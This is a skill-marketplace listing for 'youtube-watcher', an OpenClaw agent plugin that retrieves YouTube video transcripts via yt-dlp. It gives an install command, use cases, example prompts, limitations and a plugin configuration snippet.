youtube-watcher
Fetch and read transcripts from YouTube videos. Use when you need to summarize a video, answer questions about its content, or extract information from it.
Why use this skill?
Use the youtube-watcher skill to fetch YouTube video transcripts. Ideal for summarizing content, answering questions, and automating research in OpenClaw.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/sakaen736jih/youtube-watcher-zWhat This Skill Does
The youtube-watcher skill is a powerful utility designed for OpenClaw agents to interact with YouTube content by retrieving text transcripts. By parsing the underlying caption data of a video, the skill allows the agent to "read" the video's content, effectively bridging the gap between multimedia files and text-based reasoning. This enables users to perform complex analysis on video data without needing to manually watch hours of footage or scrub through timelines. It processes subtitles—both manually added and auto-generated—to provide a clean, readable text format for downstream AI processing.
Installation
Installation involves two main parts: the OpenClawProvider runtime and the skill itself. First, ensure OpenClawProvider is set up on your system following the instructions for your specific OS (Windows or MacOS). Once the provider is active, use the command clawhub install openclaw/skills/skills/sakaen736jih/youtube-watcher-z in your terminal. You must also ensure that yt-dlp is installed and accessible in your system's PATH, as the backend script relies on it to handle the retrieval of video metadata and caption streams.
Use Cases
This skill is ideal for content creators, researchers, and students. Use it to generate detailed summaries of long-form podcasts, extract technical explanations from software tutorials, or perform quick fact-checking on news reports. It simplifies knowledge management by turning ephemeral video clips into searchable text documentation that can be stored or analyzed alongside your other notes.
Example Prompts
- "Can you watch this YouTube link and provide a five-bullet-point summary of the key takeaways?"
- "I am looking for the specific timestamp or section in this video where the author discusses Python decorators. Can you find it for me?"
- "Please explain the main argument made in this documentary based on the transcript."
Tips & Limitations
Note that this skill relies entirely on the availability of closed captions. If a video creator has disabled subtitles or if the auto-generation feature has failed to process the audio, the skill will return an error. Always verify that your network connection is stable, as fetching long transcripts from YouTube involves external API interactions that can be interrupted by unstable links or blocked traffic. For the best results, use videos that are in languages supported by YouTube's native auto-captioning systems.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-sakaen736jih-youtube-watcher-z": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
auto-updater
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
Agent Browser
A fast Rust-based headless browser automation CLI with Node.js fallback that enables AI agents to navigate, click, type, and snapshot pages via structured commands.
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
bird
X/Twitter CLI for reading, searching, and posting via cookies or Sweetistics.